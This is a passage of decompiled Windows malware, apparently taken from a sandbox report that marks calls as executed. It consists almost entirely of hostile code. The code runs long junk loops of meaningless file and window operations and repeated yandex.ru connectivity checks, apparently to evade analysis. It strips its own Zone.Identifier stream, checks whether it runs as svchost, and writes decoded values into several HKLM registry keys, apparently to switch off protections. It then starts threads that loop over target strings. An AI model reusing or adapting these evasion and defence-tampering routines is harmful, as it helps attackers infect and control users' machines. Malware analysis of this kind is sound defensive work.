					asm("movsw");
					memcpy( &_v3424, 0xab71a8, 6 << 2);
					asm("movsw");
					memcpy( &_v1956, 0xab71c4, 0xb << 2);
					asm("movsb");
					memcpy( &_v4068, 0xab71f8, 0x10 << 2);
					asm("movsw");
					_t1236 =  *0xab723c; // 0xb8a5bf90
					_v4156 = _t1236;
					_t587 =  *0xab7240; // 0xa6a8a182
					_v4152 = _t587;
					_t1111 =  *0xab7244; // 0x9eb4a3b0
					_v4148 = _t1111;
					_t1237 =  *0xab7248; // 0xa3a3b4a7
					_v4144 = _t1237;
					_t588 =  *0xab724c; // 0xb4b5b8
					_v4140 = _t588;
					_t1112 =  *0xab7250; // 0xb8a5bf90
					_v1908 = _t1112;
					_t1238 =  *0xab7254; // 0xa4a3b887
					_v1904 = _t1238;
					_t589 =  *0xab7258; // 0xb4a79ea2
					_v1900 = _t589;
					_t1113 =  *0xab725c; // 0xb5b8a3a3
					_v1896 = _t1113;
					_t1239 =  *0xab7260; // 0xb4
					_v1892 = _t1239;
					memcpy( &_v4132, 0xab7264, 5 << 2);
					asm("movsw");
					asm("movsb");
					_t591 =  *0xab727c; // 0xb4a3b897
					_v1184 = _t591;
					_t1116 =  *0xab7280; // 0xbdbdb0a6
					_v1180 = _t1116;
					_t1240 =  *0xab7284; // 0xa3b4a79e
					_v1176 = _t1240;
					_t592 =  *0xab7288; // 0xb4b5b8a3
					_v1172 = _t592;
					_t1117 =  *0xab728c; // 0x0
					_v1168 = _t1117;
					_t1241 =  *0xab7290; // 0xb4a3b897
					_v3972 = _t1241;
					_t593 =  *0xab7294; // 0xbdbdb0a6
					_v3968 = _t593;
					_t1118 =  *0xab7298; // 0xb0a2b895
					_v3964 = _t1118;
					_t1242 =  *0xab729c; // 0x9fb4bdb3
					_v3960 = _t1242;
					_t594 =  *0xab72a0; // 0xb7b8a5be
					_v3956 = _t594;
					_t1119 =  *0xab72a4; // 0xa8
					_v3952 = _t1119;
					_t1243 =  *0xab72a8; // 0xb0b5a184
					_v3992 = _t1243;
					_t595 =  *0xab72ac; // 0x9ea2b4a5
					_v3988 = _t595;
					_t1120 =  *0xab72b0; // 0xa3a3b4a7
					_v3984 = _t1120;
					_t1244 =  *0xab72b4; // 0xf1b4b5b8
					_v3980 = _t1244;
					_t596 =  *0xab72b8; // 0x0
					_v3976 = _t596;
					_t1121 =  *0xab72bc; // 0xb0b5a184
					_v2584 = _t1121;
					_t1245 =  *0xab72c0; // 0x95a2b4a5
					_v2580 = _t1245;
					_t597 =  *0xab72c4; // 0xb3b0a2b8
					_v2576 = _t597;
					_t1122 =  *0xab72c8; // 0xbe9fb4bd
					_v2572 = _t1122;
					_t1246 =  *0xab72cc; // 0xa8b7b8a5
					_v2568 = _t1246;
					_t598 =  *0xab72d0; // 0x0
					_v2564 = _t598;
					memcpy( &_v1164, 0xab72d4, 9 << 2);
					memcpy( &_v4108, 0xab72f8, 0xa << 2);
					_t1127 =  *0xab7320; // 0xb0a2b895
					_v1128 = _t1127;
					_t1247 =  *0xab7324; // 0x82b4bdb3
					_v1124 = _t1247;
					_t601 =  *0xab7328; // 0x83
					_v1120 = _t601;
					_t1128 =  *0xab732a; // 0x0
					_v1118 = _t1128;
					memcpy( &_v1116, 0xab7330, 0x10 << 2);
					_t1405 = _t1395 + 0x78;
					_t603 = CreateMutexA(0, 0,  &_v1296); // executed
					_v4136 = _t603;
					if(GetLastError() != 0xb7) {
						_v1888 = 0;
						_v528 = 1;
						_v1340 = 0;
						_v1336 = 0;
						_v1332 = 0;
						_v1328 = 0;
						_v1324 = 0;
						_v1320 = 0;
						_v1316 = 0;
						_v1312 = 0;
						_v1308 = 0;
						_v1304 = 0;
						_v1300 = 0;
						_v2612 = 0x1f7c;
						while(_v1300 < _v2612) {
							_t912 = PathFileExistsW(L"3r37grg73g7e37geg73g7eg73g7e"); // executed
							if(_t912 == 0) {
								L68:
								_t913 = FindWindowA("3r38r38r838r838r388r838r83", 0); // executed
								_v4240 = _t913;
								if(_v4240 == 0) {
									L97:
									_v1300 = _v1300 + 1;
									continue;
								}
								MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
								Sleep(0x1f40);
								DeleteFileW(L"nw55n5nww5n5nww5nw5n5n5n5n");
								MoveFileA("4tt4t4wwt44t4tw4tw4wt4tw4t", "2uu5uii55i5i25i52i5ii2525i5i25i");
								Sleep(0x7d0);
								_v4276 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
								DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
								if(_v4276 != 0) {
									DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
									_v4264 = InternetOpenUrlA(_v4276, "http://www.yandex.ru/", 0, 0, 0, 0);
									if(_v4264 != 0) {
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										Sleep(0x1388);
									}
									InternetCloseHandle(_v4264);
									Sleep(0x1388);
								}
								InternetCloseHandle(_v4276);
								if(PathFileExistsA("2uu5uii55i5i25i52i5ii2525i5i25i") != 0) {
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									MoveFileA("4tt4t4wwt44t4tw4tw4wt4tw4t", "2uu5uii55i5i25i52i5ii2525i5i25i");
								}
								_v4260 = FindWindowA("3r37g37e7g3ge3ge7g37ge737eg", 0);
								if(_v4260 != 0) {
									CopyFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									CloseWindow(_v4240);
								}
								Sleep(0xbb8);
								MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
								ShowWindow(_v4240, 1);
								MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
								SetForegroundWindow(_v4240);
								Sleep(0x7d0);
								SetFocus(_v4240);
								_v4284 = 0x5a;
								_v4268 = 0x32;
								_v4280 = _v4284 + _v4268;
								if(_v4280 < 0x2710) {
									MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
									_v4288 = FindWindowA("2uu5uii55i5i25i52i5ii2525i5i25i", 0);
									_v4276 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
									if(_v4276 != 0) {
										Sleep(0x3e8);
										_v4264 = InternetOpenUrlA(_v4276, "http://www.yandex.ru/", 0, 0, 0, 0);
										if(_v4264 != 0) {
											Sleep(0x2710);
											MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
											DeleteFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h");
											MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"nw55n5nww5n5nww5nw5n5n5n5n");
										}
										InternetCloseHandle(_v4264);
										Sleep(0x64);
									}
									InternetCloseHandle(_v4276);
									Sleep(0x3e8);
									if(_v4288 != 0) {
										SetForegroundWindow(_v4288);
										DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
										MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
										ShowWindow(_v4288, 0);
										DeleteFileW(L"nw55n5nww5n5nww5nw5n5n5n5n");
										Sleep(0xdac);
										_v4276 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
										if(_v4276 != 0) {
											_v4264 = InternetOpenUrlA(_v4276, "http://www.yandex.ru/", 0, 0, 0, 0);
											if(_v4264 != 0) {
												MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
											}
											InternetCloseHandle(_v4264);
											Sleep(0x64);
											MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
											DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
											Sleep(0x2710);
										}
										InternetCloseHandle(_v4276);
									}
								}
								_v4272 = 0x15f90;
								_v4256 = 0x190;
								while(_v4272 > _v4256) {
									_v4292 = FindWindowA("3r38r38r838r838r388r838r83", 0);
									if(_v4292 != 0) {
										MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
										DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
										_v4256 = _v4256 + 1;
									}
								}
								_v4296 = 0;
								while(_v4296 < 0x2328) {
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									Sleep(0x1388);
									MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
									_v4296 = _v4296 + 1;
								}
								goto L97;
							}
							MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
							_v4248 = 0;
							while(_v4248 < 0xbb8) {
								MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
								DeleteFileA("3r38r38r838r838r388r838r83");
								_v4248 = _v4248 + 1;
							}
							Sleep(0x7d0);
							_v4244 = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
							if(_v4244 != 0) {
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								CopyFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								DeleteFileA("3r38r38r838r838r388r838r83");
								Sleep(0x2710);
							}
							_v4252 = 0;
							while(_v4252 < 0x9c4) {
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								_v4252 = _v4252 + 1;
							}
							goto L68;
						}
						Sleep(0x1f4); // executed
						_t607 = GetModuleFileNameW(0,  &_v1884, 0x208);
						Sleep(0x1f4); // executed
						E00AB16D0(_t607); // executed
						__imp__CoInitializeEx(0, 0); // executed
						_v3428 = PathFindFileNameW( &_v1884);
						wsprintfW( &_v524, L"%ls:Zone.Identifier",  &_v1884);
						DeleteFileW( &_v524); // executed
						srand(GetTickCount());
						Sleep(0x64); // executed
						_t614 = E00AB5560( &_v1884, L"svchost.");
						_t1408 = _t1405 + 0x18;
						if(_t614 != 0) {
							L195:
							Sleep(0x1f4); // executed
							_t616 = E00AB27E0( &_v1956);
							_t1409 = _t1408 + 4;
							_t617 = RegOpenKeyExA(0x80000002, _t616, 0, 0xf003f,  &_v1888); // executed
							if(_t617 != 0) {
								L201:
								Sleep(0x1f4); // executed
								_t619 = E00AB27E0( &_v1164);
								_t1410 = _t1409 + 4;
								_t620 = RegOpenKeyExA(0x80000002, _t619, 0, 0xf003f,  &_v1888); // executed
								if(_t620 == 0) {
									E00AB27E0( &_v4156);
									E00AB27E0( &_v1908);
									E00AB27E0( &_v4132);
									E00AB27E0( &_v1184);
									E00AB27E0( &_v3972);
									E00AB27E0( &_v3992);
									E00AB27E0( &_v2584);
									_t1410 = _t1410 + 0x1c;
									RegSetValueExA(_v1888,  &_v4156, 0, 4,  &_v528, 4); // executed
									RegSetValueExA(_v1888,  &_v1908, 0, 4,  &_v528, 4); // executed
									RegSetValueExA(_v1888,  &_v4132, 0, 4,  &_v528, 4); // executed
									RegSetValueExA(_v1888,  &_v1184, 0, 4,  &_v528, 4); // executed
									RegSetValueExA(_v1888,  &_v3972, 0, 4,  &_v528, 4); // executed
									RegSetValueExA(_v1888,  &_v3992, 0, 4,  &_v528, 4); // executed
									RegSetValueExA(_v1888,  &_v2584, 0, 4,  &_v528, 4); // executed
									RegCloseKey(_v1888); // executed
								}
								Sleep(0x1f4); // executed
								_t621 = E00AB27E0( &_v4108);
								_t1411 = _t1410 + 4;
								_t622 = RegOpenKeyExA(0x80000002, _t621, 0, 0xf003f,  &_v1888); // executed
								if(_t622 == 0) {
									E00AB27E0( &_v4156);
									E00AB27E0( &_v1908);
									E00AB27E0( &_v4132);
									E00AB27E0( &_v1184);
									E00AB27E0( &_v3972);
									E00AB27E0( &_v3992);
									E00AB27E0( &_v2584);
									_t1411 = _t1411 + 0x1c;
									RegSetValueExA(_v1888,  &_v4156, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v1908, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v4132, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v1184, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v3972, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v3992, 0, 4,  &_v528, 4);
									RegSetValueExA(_v1888,  &_v2584, 0, 4,  &_v528, 4);
									RegCloseKey(_v1888);
								}
								Sleep(0x1f4);
								CreateThread(0, 0, E00AB1660, 0, 0, 0); // executed
								Sleep(0x1f4); // executed
								CreateThread(0, 0, E00AB2600, 0, 0, 0); // executed
								Sleep(0x1f4);
								while(1) {
									Sleep(0x64); // executed
									_v4420 = 0;
									while(_v4420 < 8) {
										Sleep(0x64); // executed
										_v4424 = 0;
										while(_v4424 < 6) {
											Sleep(0x64); // executed
											wsprintfA( &_v3396, "%s%s",  *((intOrPtr*)(_t1394 + _v4420 * 4 - 0x7c0)),  *((intOrPtr*)(_t1394 + _v4424 * 4 - 0x9fc)));
											_t630 = E00AB2A10( &_v3396, _t1394 + _v4424 * 4 - 0x538); // executed
											_t1411 = _t1411 + 0x18;
											if((_t630 & 0x000000ff) == 1) {
												E00AB19F0( &_v3396);
												_t1411 = _t1411 + 4;
											}
											_v4424 = _v4424 + 1;
										}
										_v4420 = _v4420 + 1;
									}
									_t625 = rand();
									asm("cdq");
									Sleep(0x2710 + _t625 % 0xea60 * 0x14); // executed
								}
							}
							RegSetValueExA(_v1888, E00AB27E0( &_v1360), 0, 4,  &_v528, 4); // executed
							_t688 = E00AB27E0( &_v4068);
							_t1426 = _t1409 + 8;
							_t689 = RegOpenKeyExA(0x80000002, _t688, 0, 0xf003f,  &_v1888); // executed
							if(_t689 != 0) {
								_t706 = E00AB27E0( &_v4068);
								_t1426 = _t1426 + 4;
								RegCreateKeyExA(0x80000002, _t706, 0, 0, 0, 0x20006, 0,  &_v1888, 0);
							}
							_t691 = E00AB27E0( &_v4068);
							_t1409 = _t1426 + 4;
							_t692 = RegOpenKeyExA(0x80000002, _t691, 0, 0xf003f,  &_v1888); // executed
							if(_t692 == 0) {
								E00AB27E0( &_v2536);
								E00AB27E0( &_v1212);
								E00AB27E0( &_v3424);
								_t1409 = _t1409 + 0xc;
								RegSetValueExA(_v1888,  &_v2536, 0, 4,  &_v528, 4);
								RegSetValueExA(_v1888,  &_v1212, 0, 4,  &_v528, 4);
								RegSetValueExA(_v1888,  &_v3424, 0, 4,  &_v528, 4);
								RegCloseKey(_v1888);
							}
							RegCloseKey(_v1888);
							goto L201;
						}
						Sleep(0x1f4);
						_v1300 = 0;
						_v2612 = 0x2346;
						while(_v1300 < _v2612) {
							_v4300 = FindWindowA("3r38r38r838r838r388r838r83", 0);
							if(_v4300 == 0) {
								L130:
								_v1300 = _v1300 + 1;
								continue;
							}
							DeleteFileA("3r38r38r838r838r388r838r83");
							Sleep(0x1770);
							DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
							if(PathFileExistsA("2uu5uii55i5i25i52i5ii2525i5i25i") != 0) {
								DeleteFileA("3r38r38r838r838r388r838r83");
								MoveFileA("4tt4t4wwt44t4tw4tw4wt4tw4t", "2uu5uii55i5i25i52i5ii2525i5i25i");
								DeleteFileA("3r38r38r838r838r388r838r83");
							}
							_v4308 = FindWindowA("3r37g37e7g3ge3ge7g37ge737eg", 0);
							if(_v4308 != 0) {
								MoveFileA("4tt4t4wwt44t4tw4tw4wt4tw4t", "2uu5uii55i5i25i52i5ii2525i5i25i");
								ShowWindow(_v4300, 1);
								ShowWindow(_v4300, 1);
								Sleep(0xbb8);
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								ShowWindow(_v4300, 0);
								CopyFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
								CloseWindow(_v4300);
							}
							_v4324 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
							if(_v4324 != 0) {
								_v4312 = InternetOpenUrlA(_v4324, "http://www.yandex.ru/", 0, 0, 0, 0);
								if(_v4312 != 0) {
									DeleteFileA("3r38r38r838r838r388r838r83");
									Sleep(0x9c40);
									DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
								}
								InternetCloseHandle(_v4312);
								Sleep(0x1388);
							}
							InternetCloseHandle(_v4324);
							Sleep(0xbb8);
							ShowWindow(_v4300, 1);
							MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
							ShowWindow(_v4300, 0);
							Sleep(0x7d0);
							SetForegroundWindow(_v4300);
							DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
							SetFocus(_v4300);
							CloseWindow(_v4300);
							_v4332 = 0x22;
							_v4316 = 0x3c;
							_v4328 = _v4332 + _v4316;
							if(_v4328 < 0x1f4) {
								DeleteFileA("3r38r38r838r838r388r838r83");
								_v4336 = FindWindowA("2uu5uii55i5i25i52i5ii2525i5i25i", 0);
								MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
								_v4324 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
								if(_v4324 != 0) {
									_v4312 = InternetOpenUrlA(_v4324, "http://www.yandex.ru/", 0, 0, 0, 0);
									if(_v4312 != 0) {
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										Sleep(0x2710);
										DeleteFileA("3r37g37e7g3ge3ge7g37ge737eg");
									}
									InternetCloseHandle(_v4312);
									Sleep(0x64);
								}
								InternetCloseHandle(_v4324);
								Sleep(0x3e8);
								if(_v4336 != 0) {
									Sleep(0x7d0);
									SetForegroundWindow(_v4336);
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									ShowWindow(_v4336, 0);
									DeleteFileA("3r37g37e7g3ge3ge7g37ge737eg");
									Sleep(0x1194);
									_v4324 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
									if(_v4324 != 0) {
										_v4312 = InternetOpenUrlA(_v4324, "http://www.yandex.ru/", 0, 0, 0, 0);
										if(_v4312 != 0) {
											Sleep(0x1388);
											DeleteFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h");
											MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
											DeleteFileA("3r38r38r838r838r388r838r83");
										}
										InternetCloseHandle(_v4312);
										Sleep(0x1388);
									}
									InternetCloseHandle(_v4324);
									DeleteFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h");
								}
							}
							_v4320 = 0x1770;
							_v4304 = 0x8fc;
							while(_v4320 > _v4304) {
								_v4340 = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
								if(_v4340 != 0) {
									DeleteFileA("2uu5uii55i5i25i52i5ii2525i5i25i");
									_v4304 = _v4304 + 1;
								}
							}
							_v4344 = 0;
							while(_v4344 < 0x1388) {
								DeleteFileA("3r38r38r838r838r388r838r83");
								MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
								_v4344 = _v4344 + 1;
							}
							goto L130;
						}
						Sleep(0x3e8);
						_v4348 = 0;
						while(_v4348 < 3) {
							Sleep(0x1f4);
							_v1300 = 0;
							_v2612 = 0x236e;
							while(_v1300 < _v2612) {
								_v4352 = FindWindowA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", 0);
								if(_v4352 == 0) {
									L172:
									if(PathFileExistsW(L"3r37grg73g7e37geg73g7eg73g7e") == 0) {
										L183:
										_v1300 = _v1300 + 1;
										continue;
									}
									DeleteFileA("3r38r38r838r838r388r838r83");
									_v4412 = 0;
									while(_v4412 < 0x1770) {
										MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
										DeleteFileA("3r38r38r838r838r388r838r83");
										_v4412 = _v4412 + 1;
									}
									Sleep(0x1388);
									_v4408 = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
									if(_v4408 != 0) {
										DeleteFileA("3r38r38r838r838r388r838r83");
										SetForegroundWindow(_v4352);
										SetFocus(_v4352);
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
										Sleep(0xc8);
										CloseWindow(_v4352);
										Sleep(0xfa0);
									}
									_v4416 = 0;
									while(_v4416 < 0x9c4) {
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
										_v4416 = _v4416 + 1;
									}
									goto L183;
								}
								Sleep(0x7d0);
								DeleteFileA("3r38r38r838r838r388r838r83");
								DeleteFileA("3r38r38r838r838r388r838r83");
								Sleep(0x7d0);
								DeleteFileA("3r38r38r838r838r388r838r83");
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"w4rr4w4rw4rwr44rr4w4rr44r");
								_v4388 = 0;
								while(_v4388 < 0x190) {
									Sleep(0xfa0);
									MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
									MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
									Sleep(0xfa0);
									DeleteFileA("3r38r38r838r838r388r838r83");
									_v4388 = _v4388 + 1;
								}
								Sleep(0x3e8);
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								Sleep(0x1770);
								MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
								Sleep(0x1388);
								DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
								_v4376 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
								DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								if(_v4376 == 0) {
									L148:
									Sleep(0x7d0);
									DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
									InternetCloseHandle(_v4376);
									DeleteFileA("3r38r38r838r838r388r838r83");
									SetForegroundWindow(_v4352);
									SetFocus(_v4352);
									MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
									CloseWindow(_v4352);
									MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
									_v4384 = 0x58;
									_v4368 = 0x42;
									_v4380 = _v4384 + _v4368;
									if(_v4380 < 0x1f4) {
										MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
										Sleep(0x1388);
										MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
										_v4396 = FindWindowA("2uu5uii55i5i25i52i5ii2525i5i25i", 0);
										_v4376 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
										if(_v4376 != 0) {
											Sleep(0x1388);
											MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
											_v4364 = InternetOpenUrlA(_v4376, "http://www.yandex.ru/", 0, 0, 0, 0);
											if(_v4364 != 0) {
												Sleep(0x1388);
												DeleteFileA("3r38r38r838r838r388r838r83");
												MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"nw55n5nww5n5nww5nw5n5n5n5n");
												Sleep(0xfa0);
												DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
											}
											InternetCloseHandle(_v4364);
											Sleep(0xdac);
										}
										InternetCloseHandle(_v4376);
										Sleep(0x1388);
										if(_v4396 != 0) {
											MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
											ShowWindow(_v4396, 0);
											SetForegroundWindow(_v4396);
											DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
											Sleep(0xfa0);
											_v4376 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
											if(_v4376 != 0) {
												_v4364 = InternetOpenUrlA(_v4376, "http://www.yandex.ru/", 0, 0, 0, 0);
												if(_v4364 != 0) {
													Sleep(0x1388);
													MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
													Sleep(0x1388);
													DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
												}
												InternetCloseHandle(_v4364);
												Sleep(0x1388);
												DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
												Sleep(0x3e8);
											}
											InternetCloseHandle(_v4376);
										}
									}
									_v4372 = 0x12fd1;
									_v4356 = 0x3e7;
									while(_v4372 > _v4356) {
										_v4400 = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
										if(_v4400 != 0) {
											DeleteFileA("3r38r38r838r838r388r838r83");
											MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
											Sleep(0x1388);
											DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
											Sleep(0x1388);
											_v4356 = _v4356 + 1;
										}
									}
									if(PathFileExistsA("2uu5uii55i5i25i52i5ii2525i5i25i") != 0) {
										DeleteFileA("3r38r38r838r838r388r838r83");
										Sleep(0x1388);
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										Sleep(0x1f4);
										MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
									}
									_v4360 = FindWindowA("3r37g37e7g3ge3ge7g37ge737eg", 0);
									if(_v4360 != 0) {
										Sleep(0x1388);
										DeleteFileA("3r38r38r838r838r388r838r83");
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										SetForegroundWindow(_v4352);
										MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
										ShowWindow(_v4352, 1);
										MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
										MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
										Sleep(0xc8);
										CloseWindow(_v4352);
										Sleep(0x1f4);
									}
									_v4404 = 0;
									while(_v4404 < 0x190) {
										Sleep(0x1388);
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										DeleteFileA("3r38r38r838r838r388r838r83");
										MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										_v4404 = _v4404 + 1;
									}
									goto L172;
								}
								MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
								Sleep(0x1388);
								DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								Sleep(0x1770);
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								_v4364 = InternetOpenUrlA(_v4376, "http://www.yandex.ru/", 0, 0, 0, 0);
								Sleep(0x7d0);
								if(_v4364 == 0) {
									L147:
									InternetCloseHandle(_v4364);
									DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
									goto L148;
								}
								_v4392 = 0;
								while(_v4392 < 0x190) {
									DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
									Sleep(0x7d0);
